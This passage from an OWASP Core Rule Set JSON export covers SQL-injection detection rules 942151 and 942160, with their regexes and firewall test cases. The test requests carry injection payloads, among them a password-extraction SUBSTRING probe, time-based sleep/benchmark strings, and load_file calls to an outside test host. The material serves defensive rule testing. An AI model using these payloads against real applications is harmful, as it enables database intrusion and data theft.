"(?i)\\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|eil(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert_tz)?)|t)|rc32|ur(?:(?:dat|tim)e|rent_(?:date|setting|time(?:stamp)?|user)))|d(?:a(?:t(?:abase(?:_to_xml)?|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|s_(?:de|en)crypt)|ump)|e(?:n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t(?:_(?:format|lock)|pgusername))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|superuser)|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|insert|object(?:_(?:agg|keys))?|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|insert_id)|case|east|i(?:kely|nestring)|o(?:_(?:from_bytea|put)|ad_file|ca(?:ltimestamp|te)|g(?:10|2))|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|(?:databas|read_fil)e|l(?:argeobject|s_dir)|sleep|user)|o(?:lygon|w)|rocedure_analyse)|qu(?:ery_to_xml|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[12]?|in|oundex|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp))|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\\(", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Injection Attack: SQL function name detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Advanced SQL injection", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=foo'||(select extractvalue(xmltype('%tocob;" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=foo'||(select extractvalue(xmltype('%tocob;" } ] }, { "description": "Simple SQL injection", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" } ] }, { "description": "Advanced SQL injection", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" } ] }, { "description": "Simple injection using 'fetch_in_set'", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=, FIND_IN_SET('22', Category )" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=, FIND_IN_SET('22', Category )" } ] }, { "description": "SQL injection using 'substring' function", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=%27%20AND%20SUBSTRING%28%28SELECT%20Password%20FROM%20Users%20WHERE%20Username%20%3D%20%27Administrator%27%29%2C%201%2C%201%29%20%3E%20%27m" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=%27%20AND%20SUBSTRING%28%28SELECT%20Password%20FROM%20Users%20WHERE%20Username%20%3D%20%27Administrator%27%29%2C%201%2C%201%29%20%3E%20%27m" } ] }, { "description": "SQL injection using SQLite 'sqlite_compileoption_used' function", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" } ] }, { "description": "SQL injection using SQLite 'sqlite_compileoption_get' function", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" } ] }, { "description": "SQL injection using PostgreSQL starts_with() function", "test_id": 8, "request": { "method": "GET", "uri": "/get/index.php?id=starts_with(password,'a')::int", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=starts_with(password,'a')::int" } ] }, { "description": "SQL injection using PostgreSQL jsonb_pretty() function", "test_id": 9, "request": { "method": "GET", "uri": "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=jsonb_pretty(...(1,password)::jsonb)::int" } ] }, { "description": "SQL injection using PostgreSQL json_build_object() function", "test_id": 10, "request": { "method": "GET", "uri": "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=...(json_build_object(1,password)::jsonb)::int" } ] }, { "description": "SQL injection using unistr() function", "test_id": 11, "request": { "method": "GET", "uri": "/get/index.php?id=unistr(password)::int", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=unistr(password)::int" } ] }, { "description": "False positive with elt (", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=Weitere überlieferte Bezeichnungen sind Harsle (1319), Crucesignati in Herslo (1475) und Haßelt (1599)." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=Weitere überlieferte Bezeichnungen sind Harsle (1319), Crucesignati in Herslo (1475) und Haßelt (1599)." } ] }, { "description": "False positive with left (", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=Left (WA, RR), following wood edge south (‘Restrictive Byway’/RB) for ½ mile to Pangfield Farm (564719)." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=Left (WA, RR), following wood edge south (‘Restrictive Byway’/RB) for ½ mile to Pangfield Farm (564719)." } ] }, { "description": "False positive with quarter (", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=One quarter (24%) of people have had an affair and cheated on a partner at some point in their lives, according to results released today." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=One quarter (24%) of people have had an affair and cheated on a partner at some point in their lives, according to results released today." } ] }, { "description": "False positive with space (", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=You can choose between front up to maximise space (ideal for art and drawing), left up (for right handed users) and right up (for left handed users)." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=You can choose between front up to maximise space (ideal for art and drawing), left up (for right handed users) and right up (for left handed users)." } ] }, { "description": "False positive with likelihood (", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=A maximum of the likelihood function occurs at the same parameter-value as a maximum of the logarithm of the likelihood (the \"log likelihood\"), because the logarithm is an increasing function." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=A maximum of the likelihood function occurs at the same parameter-value as a maximum of the logarithm of the likelihood (the \"log likelihood\"), because the logarithm is an increasing function." } ] }, { "description": "False positive with lower (", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=Below the rank of species he sometimes recognized taxa of a lower (unnamed) rank ; these have since acquired standardised names such as variety in botany and subspecies in zoology." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=Below the rank of species he sometimes recognized taxa of a lower (unnamed) rank ; these have since acquired standardised names such as variety in botany and subspecies in zoology." } ] }, { "description": "False positive with convert (", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=Grasshopper v1.0 made its eighth, and final, test flight on October 7, 2013, flying to an altitude of convert (0.46 miles) before making its eighth successful VTVL landing." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=Grasshopper v1.0 made its eighth, and final, test flight on October 7, 2013, flying to an altitude of convert (0.46 miles) before making its eighth successful VTVL landing." } ] }, { "description": "False positive with position (", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=In older texts printed down to c. 1630, v was used in initial position (even when it represented a vowel, e.g. in vt, later printed ut) and u was used elsewhere, e.g. in nouus, later printed novus." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=In older texts printed down to c. 1630, v was used in initial position (even when it represented a vowel, e.g. in vt, later printed ut) and u was used elsewhere, e.g. in nouus, later printed novus." } ] }, { "description": "False positive with degrees (", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=The measures of the interior angles of the triangle always add up to 180 degrees (same color to point out they are equal)." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=The measures of the interior angles of the triangle always add up to 180 degrees (same color to point out they are equal)." } ] }, { "description": "False positive with unlikely (", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=There are numerous causes of asystole that may be reversible if determined quickly enough, however, survival is very unlikely (~2% if not in a hospital)." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=There are numerous causes of asystole that may be reversible if determined quickly enough, however, survival is very unlikely (~2% if not in a hospital)." } ] }, { "description": "False positive with left, (", "test_id": 22, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=The script is written from right to left, (Lal 1966) and sometimes follows a boustrophedonic style." }, "expected": { "should_block": false, "rule_ids": [ 942151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=The script is written from right to left, (Lal 1966) and sometimes follows a boustrophedonic style." } ] } ], "raw_rule": { "type": "SecRule", "lineno": 110, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|eil(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert_tz)?)|t)|rc32|ur(?:(?:dat|tim)e|rent_(?:date|setting|time(?:stamp)?|user)))|d(?:a(?:t(?:abase(?:_to_xml)?|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|s_(?:de|en)crypt)|ump)|e(?:n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t(?:_(?:format|lock)|pgusername))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|superuser)|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|insert|object(?:_(?:agg|keys))?|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|insert_id)|case|east|i(?:kely|nestring)|o(?:_(?:from_bytea|put)|ad_file|ca(?:ltimestamp|te)|g(?:10|2))|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|(?:databas|read_fil)e|l(?:argeobject|s_dir)|sleep|user)|o(?:lygon|w)|rocedure_analyse)|qu(?:ery_to_xml|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[12]?|in|oundex|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp))|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\\(", "actions": [ { "act_name": "id", "lineno": 111, "act_quote": "no_quote", "act_arg": "942151", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 112, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 113, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 114, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 115, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 115, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 116, "act_quote": "quotes", "act_arg": "SQL Injection Attack: SQL function name detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 117, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 118, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 119, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 120, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 121, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 122, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 123, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 124, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 125, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 126, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 127, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 128, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 129, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 110 } }, { "rule_id": "942160", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i:sleep\\s*?\\(.*?\\)|benchmark\\s*?\\(.*?\\,.*?\\))", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "replaceComments" ], "metadata": { "phase": "2", "message": "Detects blind sqli tests using sleep() or benchmark()", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function", "test_id": 1, "request": { "method": "GET", "uri": "/get?sql_table=sleep%28534543%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sleep%28534543%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "sleEP(3)" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "post_body", "value": "sleEP(3)" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "sleep(5000)" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "post_body", "value": "sleep(5000)" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "BENChmARk(2999/**/999,Md5(NoW()" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "post_body", "value": "BENChmARk(2999/**/999,Md5(NoW()" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Benchmark Function", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "BEncHMARk(2999999,Md5(NoW('')" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "post_body", "value": "BEncHMARk(2999999,Md5(NoW('')" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Benchmark Function", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "BENCHMARK(5000000,MD5(0x48416166)" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "post_body", "value": "BENCHMARK(5000000,MD5(0x48416166)" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Benchmark Function", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "benchmark(3000000,M%445(4)" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "post_body", "value": "benchmark(3000000,M%445(4)" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Benchmark Function", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Benchmark Function", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" }, 